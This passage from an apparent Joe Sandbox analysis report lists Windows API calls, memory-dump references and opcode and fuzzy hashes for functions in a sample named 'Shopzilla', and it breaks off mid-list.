                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00BC40D8), ref: 00BC41D8
                                              • GetProcAddress.KERNEL32(00000000), ref: 00BC41DF
                                              • EncodePointer.KERNEL32(00000000), ref: 00BC41EA
                                              • DecodePointer.KERNEL32(00BC40D8), ref: 00BC4205
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: a39a4ddee0a3b86941056a978e53c57462e20169eed957e656ce7c1cd327052c
                                              • Instruction ID: 18d73e7d0c110f11ccf538238ec9be7fc89f887cd1c80a1ce47e2d7fe4dbe832
                                              • Opcode Fuzzy Hash: a39a4ddee0a3b86941056a978e53c57462e20169eed957e656ce7c1cd327052c
                                              • Instruction Fuzzy Hash: F0E0BD7A6B1300ABEB649F61BD2EF4D3AA4BB22B02F200069F041E50B0CBF54685CB10
                                              APIs
                                              • GetClientRect.USER32(?,?), ref: 00BA21B8
                                              • GetWindowRect.USER32(?,?), ref: 00BA21F9
                                              • ScreenToClient.USER32(?,?), ref: 00BA2221
                                              • GetClientRect.USER32(?,?), ref: 00BA2350
                                              • GetWindowRect.USER32(?,?), ref: 00BA2369
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Rect$Client$Window$Screen
                                              • String ID:
                                              • API String ID: 1296646539-0
                                              • Opcode ID: 7d379502b1199353646dd4db614ffe19846ffd53880f030a4062d4b3d1e50103
                                              • Instruction ID: 4309fd9cf803b7f75fb854675106f07a88d52c90352e7ddcdc610b9d1294e994
                                              • Opcode Fuzzy Hash: 7d379502b1199353646dd4db614ffe19846ffd53880f030a4062d4b3d1e50103
                                              • Instruction Fuzzy Hash: A8B15939904249DBDF14CFA8C580BEDB7F1FF09310F1485AAED59AB254EB34AA50CB64
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              • Opcode ID: 9c84728a43189bd6ce68faab2277934646e23141b114edc06f1b291e46af5055
                                              • Instruction ID: 47cc63056fa1f54e94a3a17268da6f51650f9d2ea9c69da0282a15ce8b5e27e3
                                              • Opcode Fuzzy Hash: 9c84728a43189bd6ce68faab2277934646e23141b114edc06f1b291e46af5055
                                              • Instruction Fuzzy Hash: 1161CC3060425A9FCB11FF64C881EFE37A8AF45308F448599F8996B2D2DB74AD15EB60
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00C21242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C201D5,?,?), ref: 00C21259
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C206E5
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C20725
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C20748
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C20771
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C207B4
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00C207C1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              • Opcode ID: 7cda8c7a219cbfbf35947c259877a105c97f7847f2735e1754c15834c6000ddd
                                              • Instruction ID: 83d113372212e2b594aa51ce568a774ef5351ef4f26e954b63755eddfb289e7a
                                              • Opcode Fuzzy Hash: 7cda8c7a219cbfbf35947c259877a105c97f7847f2735e1754c15834c6000ddd
                                              • Instruction Fuzzy Hash: BF518931118304AFC714EF24D895EAEBBE8FF84710F144A5DF995872A2DB71E904CB92
                                              APIs
                                              • GetMenu.USER32(?), ref: 00C25C00
                                              • GetMenuItemCount.USER32(00000000), ref: 00C25C37
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C25C5F
                                              • GetMenuItemID.USER32(?,?), ref: 00C25CCE
                                              • GetSubMenu.USER32(?,?), ref: 00C25CDC
                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C25D2D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountMessagePostString
                                              • String ID:
                                              • API String ID: 650687236-0
                                              • Opcode ID: 972c8adaa02b3bc58011bf580980fe5c7fb81b46433d2d00107c248e414f6d20
                                              • Instruction ID: b5ef030a0509cc4da4251350b73f3bd24d816ac607bfbbb0446a666388a016f5
                                              • Opcode Fuzzy Hash: 972c8adaa02b3bc58011bf580980fe5c7fb81b46433d2d00107c248e414f6d20
                                              • Instruction Fuzzy Hash: 31518E75A00A29AFCF11EFA4D945AAEB7F4EF48310F1440A9E851BB351DB70AE41CB90
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BFF485
                                              • VariantClear.OLEAUT32(00000013), ref: 00BFF4F7
                                              • VariantClear.OLEAUT32(00000000), ref: 00BFF552
                                              • _memmove.LIBCMT ref: 00BFF57C
                                              • VariantClear.OLEAUT32(?), ref: 00BFF5C9
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BFF5F7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                              • String ID:
                                              • API String ID: 1101466143-0
                                              • Opcode ID: dbc4b6355ffa8cec2240fdfcc69be0902a862bafd933579ec065b344db71c95d
                                              • Instruction ID: 40bba705ba42f290eaa1b19ac157a2584b64be180fbaa914fd12f54438c0af57
                                              • Opcode Fuzzy Hash: dbc4b6355ffa8cec2240fdfcc69be0902a862bafd933579ec065b344db71c95d
                                              • Instruction Fuzzy Hash: 2E513D75A0020AEFDB14CF58C894AAAB7F8FF4C314B158569EA59DB304D730E955CF90
                                              APIs
                                              • _memset.LIBCMT ref: 00C0286B
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C028B6
                                              • IsMenu.USER32(00000000), ref: 00C028D6
                                              • CreatePopupMenu.USER32 ref: 00C0290A
                                              • GetMenuItemCount.USER32(000000FF), ref: 00C02968
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C02999
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              • Opcode ID: 651ea30a069902fe15c34dcf8fbb314c24eaeec34c459115c8f096f01d9ee1c1
                                              • Instruction ID: 39cbf995722629951011fbbacc0c599266b4156f2c5adc7b6302ca89e523de9d
                                              • Opcode Fuzzy Hash: 651ea30a069902fe15c34dcf8fbb314c24eaeec34c459115c8f096f01d9ee1c1
                                              • Instruction Fuzzy Hash: 3C51AB70A0020AEBDF25CF68C98CBAEBBF5EF44314F144659E865AB2D1D7709A44CF61
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00BA1B76
                                              • GetWindowRect.USER32(?,?), ref: 00BA1BDA
                                              • ScreenToClient.USER32(?,?), ref: 00BA1BF7
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BA1C08
                                              • EndPaint.USER32(?,?), ref: 00BA1C52
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                              • String ID:
                                              • API String ID: 1827037458-0
                                              • Opcode ID: bcca67e1f08c7d326c2df9d2f42407a7f2fc10864ecfc62e2cee268ef785e549
                                              • Instruction ID: 4d83201ed0286d340c060ba3fccb9c9da748c4ba2d764813048150d5bbeede33
                                              • Opcode Fuzzy Hash: bcca67e1f08c7d326c2df9d2f42407a7f2fc10864ecfc62e2cee268ef785e549
                                              • Instruction Fuzzy Hash: A841B371108300AFD720DF29DC85FBA7BF8FB4A320F140AA9F9558B2A2D7719845DB61
                                              APIs
                                              • ShowWindow.USER32(00C667B0,00000000,00D356E0,?,?,00C667B0,?,00C2B995,?,?), ref: 00C2BAFF
                                              • EnableWindow.USER32(?,00000000), ref: 00C2BB23
                                              • ShowWindow.USER32(00C667B0,00000000,00D356E0,?,?,00C667B0,?,00C2B995,?,?), ref: 00C2BB83
                                              • ShowWindow.USER32(?,00000004,?,00C2B995,?,?), ref: 00C2BB95
                                              • EnableWindow.USER32(?,00000001), ref: 00C2BBB9
                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C2BBDC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: a4ce5d98abfcc5537e8e486a35c18ee2a5a631f7d8308707be901fe73510e9ad
                                              • Instruction ID: a33d31a3d309d7c66000dcb5fec65edc0b6c7c2144ccf2c8b6a533e82cc03281
                                              • Opcode Fuzzy Hash: a4ce5d98abfcc5537e8e486a35c18ee2a5a631f7d8308707be901fe73510e9ad
                                              • Instruction Fuzzy Hash: B9415E34600550AFDB25CF24D899FA47BE1FB09314F1881A9EE688F6A6C731AD45CB90
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00C152F1,?,?,00000000,00000001), ref: 00C1755B
                                                • Part of subcall function 00C13E50: GetWindowRect.USER32(?,?), ref: 00C13E63
                                              • GetDesktopWindow.USER32 ref: 00C17585
                                              • GetWindowRect.USER32(00000000), ref: 00C1758C
                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C175BE
                                                • Part of subcall function 00C0566C: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C056E4
                                              • GetCursorPos.USER32(?), ref: 00C175EA
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C17648
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                              • String ID:
                                              • API String ID: 4137160315-0
                                              • Opcode ID: d6aefde39439868adca140d1ed35c4a994e86e1824265a5cae08965a331b95fa
                                              • Instruction ID: f387eaf0c9359c87d355968bc82e816c66048264f293813c0dcb33b72a33e1cb
                                              • Opcode Fuzzy Hash: d6aefde39439868adca140d1ed35c4a994e86e1824265a5cae08965a331b95fa
                                              • Instruction Fuzzy Hash: 7031D072108305ABD720DF14C849F9FBBEAFF89314F100A19F49997191DA30EA48CB92
                                              APIs
                                                • Part of subcall function 00BF8AAA: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BF8AC1
                                                • Part of subcall function 00BF8AAA: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BF8ACB
                                                • Part of subcall function 00BF8AAA: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BF8ADA
                                                • Part of subcall function 00BF8AAA: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BF8AE1
                                                • Part of subcall function 00BF8AAA: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BF8AF7
                                              • GetLengthSid.ADVAPI32(?,00000000,00BF8E30), ref: 00BF9265
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BF9271
                                              • HeapAlloc.KERNEL32(00000000), ref: 00BF9278
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00BF9291
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00BF8E30), ref: 00BF92A5
                                              • HeapFree.KERNEL32(00000000), ref: 00BF92AC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 3008561057-0
                                              • Opcode ID: f4b10c6fa8c331f7191421ec465c9635c77bd0948e9d27e7330042649387f92f
                                              • Instruction ID: b4ef2f7e6593c6b8f9f7e595de69680861cab20e2d73b2e8f35fb54983b124f2
                                              • Opcode Fuzzy Hash: f4b10c6fa8c331f7191421ec465c9635c77bd0948e9d27e7330042649387f92f
                                              • Instruction Fuzzy Hash: 61118E32511208FFDB149FA4CC59FBE7BA9EB45316F204099F94597210DB32A948EB60
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00BF8FE3
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00BF8FEA
                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00BF8FF9
                                              • CloseHandle.KERNEL32(00000004), ref: 00BF9004
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BF9033
                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00BF9047
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 1413079979-0
                                              • Opcode ID: 892fbd38408351f2b02b4eb69ac36a91303edede23f5d081f951c28ec53ec2fd
                                              • Instruction ID: d22394ac63b770ca76342b2ec45513f1e882b1ecbd0b931af84f6c2d4e254682
                                              • Opcode Fuzzy Hash: 892fbd38408351f2b02b4eb69ac36a91303edede23f5d081f951c28ec53ec2fd
                                              • Instruction Fuzzy Hash: 86116A7250124DAFDF118FA8ED49FEE7BA9EF08304F144095FE04A2160C7729E64EB60
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00BFC131
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BFC142
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BFC149
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00BFC151
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00BFC168
                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00BFC17A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: 5b4c83442b07edb6155233e00e67570f6b65ff7f407ed6ef9b8de030e27a1376
                                              • Instruction ID: 6161d9c4fb52053f6add6bfde41d4f7b980465c12ef81dd0538c8144d002d3f9
                                              • Opcode Fuzzy Hash: 5b4c83442b07edb6155233e00e67570f6b65ff7f407ed6ef9b8de030e27a1376
                                              • Instruction Fuzzy Hash: E1014476E40218BBEB109BA69D49B5EBFF8EB58751F1040A5FE04A7281D6709D14CFA0
                                              APIs
                                                • Part of subcall function 00BA16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA1729
                                                • Part of subcall function 00BA16CF: SelectObject.GDI32(?,00000000), ref: 00BA1738
                                                • Part of subcall function 00BA16CF: BeginPath.GDI32(?), ref: 00BA174F
                                                • Part of subcall function 00BA16CF: SelectObject.GDI32(?,00000000), ref: 00BA1778
                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00C2C2F7
                                              • LineTo.GDI32(00000000,00000003,?), ref: 00C2C30B
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C2C319
                                              • LineTo.GDI32(00000000,00000000,?), ref: 00C2C329
                                              • EndPath.GDI32(00000000), ref: 00C2C339
                                              • StrokePath.GDI32(00000000), ref: 00C2C349
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: 10426072d086b531e2685c1f41477d870593d4f4ae416ace05ad72bb2090fc8c
                                              • Instruction ID: d8b5a5a650030865e015a256c3e911c4e6f917805cdd916c8b78775bf5f7deaf
                                              • Opcode Fuzzy Hash: 10426072d086b531e2685c1f41477d870593d4f4ae416ace05ad72bb2090fc8c
                                              • Instruction Fuzzy Hash: 7411E272000108BFEB129F95DC88FEE7FA9EB08354F148461BA189A1A1C7729A55DBA0
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BC0717
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BC071F
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BC072A
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BC0735
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BC073D
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BC0745
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: e999ddba33b7b75d4671c1924f56c23d484522653489b713218e388e95ee0821
                                              • Instruction ID: 4b5c19b860319a45e930136a1831f598bb61ea6026f853710905fec66a691663
                                              • Opcode Fuzzy Hash: e999ddba33b7b75d4671c1924f56c23d484522653489b713218e388e95ee0821
                                              • Instruction Fuzzy Hash: 500148B09017597DE3008F5A8C85B56FEB8FF59354F00411BA15847941C7B5A864CBE5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C05821
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C05837
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00C05846
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C05855
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0585F
